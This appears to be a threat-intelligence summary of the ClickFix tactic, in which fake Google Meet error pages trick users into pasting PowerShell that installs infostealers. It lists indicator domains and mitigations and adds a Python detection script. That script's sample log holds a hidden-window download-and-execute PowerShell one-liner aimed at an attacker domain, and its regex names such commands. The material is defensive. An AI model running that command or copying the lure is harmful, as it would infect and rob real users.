Full Report
This blog post provides a chronological overview of the observed ClickFix campaigns. We further share technical details about a ClickFix cluster that uses fake Google Meet video conference pages to distribute infostealers.

Context

In May 2024, a new social engineering tactic called ClickFix emerged, featuring a ClearFake cluster that the Sekoia Threat Detection & Research […]

The post ClickFix tactic: The Phantom Meet (Infostealers) appeared first on InfoStealers.
Analysis Summary
# Tool/Technique: ClickFix Tactic
## Overview
The ClickFix tactic is a novel social engineering method observed in malware distribution campaigns, which involves displaying fake error messages in web browsers to trick users into copying and executing specific malicious PowerShell code. This tactic aims to bypass antivirus scanning and browser security features by leveraging user interaction with a seemingly legitimate browser/system error prompt.
## Technical Details
- Type: Technique (Social Engineering Lure)
- Platform: Windows and macOS (as the tactic is used to distribute malware targeting both)
- Capabilities: Deceiving users into executing PowerShell commands via clipboard manipulation using browser-based fake error prompts.
- First Seen: May 2024 (Reported by Proofpoint researchers)
## MITRE ATT&CK Mapping
This tactic primarily focuses on initial access and execution via user interaction:
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (If delivered via email with HTML files)
- T1204 - User Execution
- T1204.002 - Malicious File
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell (For the execution phase of the copied code)
## Functionality
### Core Capabilities
- **Deceptive Lure:** Displaying fake error messages within a web browser (e.g., mimicking Google Chrome, Facebook, PDFSimpli, reCAPTCHA errors).
- **Instructional Prompt:** Directing victims to copy and paste a specific, often malicious, PowerShell code snippet presented within the fake error window (using prompts like "Press the key combination" or "CTRL+V").
- **Credential/Data Theft Distribution:** Used to deploy various forms of malware, most commonly infostealers, but also botnets and Remote Access Tools (RATs).
### Advanced Features
- **Impersonation Infrastructure:** Utilization of convincing domains impersonating legitimate services, such as Google Meet pages (discovered by Sekoia analysts), to increase user trust.
- **Evasion:** Improves infection rates by combining drive-by download techniques with manual user execution of a script copied from a webpage element; because the victim, not the browser, runs the code, real-time AV and browser security checks are sidestepped.
## Indicators of Compromise
*Note: Indicators listed are associated with a documented cluster leveraging ClickFix, specifically using fake Google Meet pages.*
- File Hashes: [Not provided in the context]
- File Names: [Not provided in the context regarding the final payload, but the delivery mechanism involves HTML files disguised as Word documents or fake installer prompts.]
- Registry Keys: [Not provided in the context]
- Network Indicators:
  - `meet[.]google[.]us-join[.]com`
  - `meet[.]googie[.]com-join[.]us`
  - `meet[.]google[.]com-join[.]us`
  - `meet[.]google[.]web-join[.]com`
  - `meet[.]google[.]webjoining[.]com`
  - `meet[.]google[.]cdm-join[.]us`
  - `meet[.]google[.]us07host[.]com`
  - `googiedrivers[.]com`
  - IP Address: `77.221.157[.]170`
- Behavioral Indicators: Execution of PowerShell commands derived directly from content copied from a browser-displayed prompt or error box.
## Associated Threat Actors
Observed clusters using the ClickFix tactic to distribute infostealers via fake Google Meet pages are associated with:
- **Slavic Nation Empire (SNE)** (Sub-team of Marko Polo cryptocurrency scam)
- **Scamquerteo** (Sub-team of CryptoLove cryptocurrency scam)
- **TA571** (Observed leveraging the tactic since March 2024 via email phishing)
- Other intrusion sets using lures like fake Google Chrome, Facebook, PDFSimpli, and reCAPTCHA pages.
## Detection Methods
- Signature-based detection: Detection of specific PowerShell code blocks delivered via this method (if unique), or detection of specific domains/IPs listed above.
- Behavioral detection: Monitoring command-line arguments showing PowerShell accessing/executing content originating from a browser process, or scripts initiated immediately following interaction with strange browser dialogs or temporary files dropped from web sessions.
- YARA rules: [Not provided in the context]
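The two detection approaches above can be combined in one triage pass over endpoint telemetry. The following Python script is an added example written for this summary, not code from the Sekoia post or from any vendor: it refangs the network indicators listed above, flags PowerShell launched by a browser process or carrying a download-and-execute command line, and matches DNS queries against the indicator domains. The `key=value|key=value` log format, the field names, the browser process list and the sample events are all constructed assumptions for this illustration.

```python
"""Triage constructed process-creation and DNS records against the ClickFix
behaviours and indicators described in this report (added example).
Log format, field names and sample events are assumptions, not a real product's output."""
import re

# Defanged indicators from the report, refanged for matching.
CLICKFIX_DOMAINS = {
    d.replace("[.]", ".") for d in (
        "meet[.]google[.]us-join[.]com",
        "meet[.]googie[.]com-join[.]us",
        "meet[.]google[.]com-join[.]us",
        "meet[.]google[.]web-join[.]com",
        "meet[.]google[.]webjoining[.]com",
        "meet[.]google[.]cdm-join[.]us",
        "meet[.]google[.]us07host[.]com",
        "googiedrivers[.]com",
    )
}
CLICKFIX_IPS = {"77.221.157[.]170".replace("[.]", ".")}

# Assumed browser image names; extend for your environment.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Command-line traits typical of a pasted download-and-execute one-liner.
SUSPICIOUS_CMD = re.compile(
    r"(?i)(invoke-expression|\biex\b|downloadstring|invoke-webrequest|\biwr\b|"
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|mshta)"
)


def parse_event(line):
    """Parse a constructed 'key=value|key=value' record into a dict."""
    return dict(f.split("=", 1) for f in line.strip().split("|") if "=" in f)


def score_process(ev):
    """Return the reasons a process-creation event looks like ClickFix execution."""
    reasons = []
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmd", "")
    if image.endswith(("powershell.exe", "pwsh.exe")):
        if parent in BROWSERS:
            reasons.append("powershell spawned by browser")
        if SUSPICIOUS_CMD.search(cmd):
            reasons.append("download-and-execute pattern in command line")
        for ioc in CLICKFIX_DOMAINS | CLICKFIX_IPS:
            if ioc in cmd.lower():
                reasons.append(f"known ClickFix indicator in command line: {ioc}")
    return reasons


def score_dns(ev):
    """Return a reason if the queried name is, or sits under, an indicator domain."""
    q = ev.get("query", "").lower().rstrip(".")
    for d in CLICKFIX_DOMAINS:
        if q == d or q.endswith("." + d):
            return [f"DNS query for known ClickFix domain: {d}"]
    return []


def triage(lines):
    """Run every record through the matching scorer; return (host, reasons) alerts."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("type") == "process":
            reasons = score_process(ev)
        elif ev.get("type") == "dns":
            reasons = score_dns(ev)
        else:
            reasons = []
        if reasons:
            alerts.append((ev.get("host"), reasons))
    return alerts


# Constructed sample telemetry (raw strings so the Windows paths survive intact).
SAMPLE_LOG = [
    r'type=process|host=WS01|parent=explorer.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell -w hidden -c "iex (iwr https://meet.google.us07host.com/x)"',
    r'type=process|host=WS02|parent=explorer.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell -NoProfile -c Get-ChildItem',
    r'type=process|host=WS03|parent=chrome.exe|image=C:\Program Files\PowerShell\7\pwsh.exe|cmd=pwsh -c Get-Date',
    r'type=dns|host=WS01|query=meet.google.us07host.com',
    r'type=dns|host=WS04|query=meet.google.com',
]

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_LOG):
        print(host, "->", "; ".join(reasons))
```

The DNS matcher compares whole labels (`q == d` or `q.endswith("." + d)`) rather than doing a substring search, so the legitimate `meet.google.com` does not collide with `meet.google.com-join.us`. The command-line regex is deliberately broad and will fire on some administrative scripts; treat its hits as a triage signal to be combined with the parent-process and indicator checks rather than as a standalone verdict.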
## Mitigation Strategies
- **User Training:** Highly emphasize user skepticism regarding unsolicited browser errors or prompts requiring key combinations or copy/paste operations involving command-line code.
- **Restrict PowerShell Launch Paths:** Implement policies restricting the ability of browsers or web-related processes to launch interactive command-line interpreters or to use the clipboard for script execution.
- **Application Control/Whitelisting:** Limit which applications can execute PowerShell scripts.
- **Browser Security:** Ensure modern browser security features (like warning against malicious sites or drive-by downloads) are active.
## Related Tools/Techniques
The ClickFix tactic has been used to distribute various malware families, including:
- Matanbuchus
- DarkGate
- NetSupport RAT
- Lumma Stealer
- Various Windows and macOS Infostealers, Botnets, and RATs.
- Historical association with the **ClearFake** cluster in its initial emergence.